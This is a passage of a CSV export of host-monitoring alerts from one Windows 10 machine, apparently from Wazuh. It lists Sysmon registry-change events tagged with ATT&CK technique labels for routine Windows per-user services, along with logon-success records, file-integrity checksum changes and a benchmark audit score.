service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.692804700Z"",""eventRecordID"":""3340"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 13:10:54.360",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.692362600Z"",""eventRecordID"":""3339"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.343",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.678079900Z"",""eventRecordID"":""3338"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.652\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.652"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.652 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 13:10:54.324",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.677710200Z"",""eventRecordID"":""3337"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.652\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.652"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.652 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.305",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.666234600Z"",""eventRecordID"":""3336"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.637\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.637"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.637 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 13:10:54.263",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.665783700Z"",""eventRecordID"":""3335"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.637\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.637"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.637 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.217",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.663325100Z"",""eventRecordID"":""3334"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.620\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.620"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.620 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 13:10:54.203",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x681E6 + Linked Logon ID: 0x681B8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:54.149",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.663098600Z"",""eventRecordID"":""3333"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.620\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.620"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.620 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 
13:10:54.109",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x681B8 + Linked Logon ID: 0x681E6 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:53.958",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.611620300Z"",""eventRecordID"":""3331"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.604\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.604"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.604 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe 
+TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 13:10:53.878",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.611322300Z"",""eventRecordID"":""3330"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.604\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.604"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.604 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:53.099",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:10:52.539",7,"SessionEnv was 
unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 13:10:40.556",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:36.678",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 13:10:02.226",9,"Windows Application error event",, +"Apr 24, 2020 @ 13:09:49.459",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 13:09:46.413",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 13:09:15.290",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. 
It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:09:15.243",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:08:34.446",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'ae65b80d3aa8d32f38dfcf0fd6c6b1b0' +New md5sum is : 'cf3754ae4c53bb01ca8f4706679eb2c1' +Old sha1sum was: 'bab24ad7745b947cdd2101c926f3699e6f6cbe15' +New sha1sum is : 'e6b6ed8af81664d49dc704d5d1fe570c44b0494f' +", +"Apr 24, 2020 @ 13:08:23.353",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '16592ee3e500fdaa4ac162c843a5eccb' +New md5sum is : 'f3f5f5fdd6f39cf62e69610c4b6eeae1' +Old sha1sum was: 'c944e39eece978e13da14874c3db94c6dac81dde' +New sha1sum is : '260824863a974bdbdbfd3edb7f0e7b125a50d50d' +", +"Apr 24, 2020 @ 13:08:23.338",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '405cffbdc5c111b423667c5f1506f4b3' +New md5sum is : '1ae2be33276cc123ae315374ecb4bbdb' +Old sha1sum was: '12f9b0ff3cbe3b2f46df3ea4a991699671150a61' +New sha1sum is : '70a0b632322092d49ef0d93a8084c6c74562b3dd' +", +"Apr 24, 2020 @ 13:08:01.229",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '50e564d651df4ed3711c530cb99d635a' +New md5sum is : '8879c1edeb0f0361bd37d770e7639bb2' +Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda' +New sha1sum is : '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +", +"Apr 24, 2020 @ 